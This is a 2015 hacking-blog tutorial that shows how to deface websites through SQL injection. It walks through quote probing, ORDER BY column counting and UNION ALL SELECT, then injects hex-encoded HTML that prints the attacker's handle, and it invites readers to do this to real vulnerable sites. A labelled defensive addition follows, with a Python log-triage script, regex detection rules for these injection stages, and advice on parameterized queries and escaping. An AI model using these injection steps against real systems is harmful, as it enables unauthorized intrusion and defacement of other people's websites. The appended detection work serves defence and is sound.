Tuesday, October 27, 2015

How to Print Your Name on Screen with SQLi Injection!

Welcome Back to TechynHacky. :-)

I'm Asman, and today I'm gonna show you "how to print your name on screen with SQLi injection". Sometimes we need to write our name on screen to show we injected this website. Anyway, I hope you know about this :D
So let's start :v

Requirements:

1. Hackbar.
2. Vulnerable Website. :-)
3. Basic Knowledge of course :-P

For Example:
Here I have one. :-)

http://www.vul-site.com/events/event-detail.php?id=123

Step 1:
We need to check whether the site we chose is vulnerable or not.
To check, we need to put ' at the end of the website URL.
Like this:

http://www.vul-site.com/events/event-detail.php?id=123'

If you get any SQLi error, it means this website is vulnerable, so we can inject it :)
As we chose a SQLi-vulnerable site, we will surely get an error. :-D

But now the topic is how to print your name on screen!

Step 2:

Now we need to find the order number for this using this command [order by 1--+-   ]
Like this:

http://www.vul-site.com/events/event-detail.php?id=123 order by 1--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 2--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 10 (error)

It means it has 9 orders. :-)

Step 3:

Now replace order and go to UNION BASED, select UNION STATEMENT and enter the order number.
For example:

http://www.vul-site.com/events/event-detail.php?id=123 union all select 1,2,3,4,5,6,7,8,9,10 --+-

Now we will get the vulnerable table.

Step 4: Suppose the table number is 3.

Step 5: Now in the URL, replace the number 3 and write some HTML code like this:

<font color="red" size="10"> Injected By 'Därk Légènd' </font>

Now copy this code and replace 'Därk Légènd' with your own cyber name and put it in.

Step 6: Now select all the HTML code and go to => Encoding => HexEncoding => String to 00f00 first option.

When you are converting the HTML code into hex encoding, put 0x before the HTML code.

NOTE:
If you are using a phone or something which doesn't have Hackbar,
then use online tools or an app/software to convert your HTML code to hex encoding. :-)

Step 7: Click Execute, then your name is printed there :-)
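
Seen from the defender's side, the requests in Steps 1 to 7 leave a recognisable trail in the web server's access log. The following is an added example, not part of the original post: a small Python triage script that tags each stage and decodes any 0x literal so the injected markup can be read. The log lines, rule names and function names are assumptions made up for the illustration.

```python
import re
from urllib.parse import unquote_plus

MARKER = "<b>test</b>"  # constructed, harmless stand-in for injected HTML
# Constructed request lines (not from a real server), modelled on the post's URLs.
SAMPLE_REQUESTS = [
    "GET /events/event-detail.php?id=123 HTTP/1.1",
    "GET /events/event-detail.php?id=123' HTTP/1.1",
    "GET /events/event-detail.php?id=123%20order%20by%201--+- HTTP/1.1",
    "GET /events/event-detail.php?id=123%20order%20by%2010 HTTP/1.1",
    "GET /events/event-detail.php?id=123%20union%20all%20select%201,2,3,4,5,6,7,8,9,10%20--+- HTTP/1.1",
    f"GET /events/event-detail.php?id=123%20union%20all%20select%201,2,0x{MARKER.encode().hex()},4%20--+- HTTP/1.1",
]

# Hypothetical rule names; each regex runs on the URL-decoded query string.
RULES = [
    ("quote_probe", re.compile(r"=[^&]*'")),  # noisy: legitimate apostrophes match too
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("hex_literal", re.compile(r"\b0x(?:[0-9a-f]{2}){4,}", re.I)),
]
HEX = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})", re.I)

def classify(request_line):
    """Return (matched rule names, decoded hex literals) for one request line."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else request_line
    query = unquote_plus(target.partition("?")[2])  # decode %20 and + first
    hits = [name for name, rx in RULES if rx.search(query)]
    decoded = [bytes.fromhex(h).decode("utf-8", "replace") for h in HEX.findall(query)]
    return hits, decoded

def triage(lines):
    """Collect the stages seen, in first-seen order, and all decoded markup."""
    stages, markup = [], []
    for line in lines:
        hits, decoded = classify(line)
        stages += [h for h in hits if h not in stages]
        markup += decoded
    return stages, markup

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line), "<-", line)
    print("summary:", triage(SAMPLE_REQUESTS))
```

Rules like these only flag the probing. The fix on the application side is a parameterized query for the `id` value and HTML-escaping of database values when they are written into the page.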

Hope you liked this :-)
Thanks for visiting and reading.. :-)
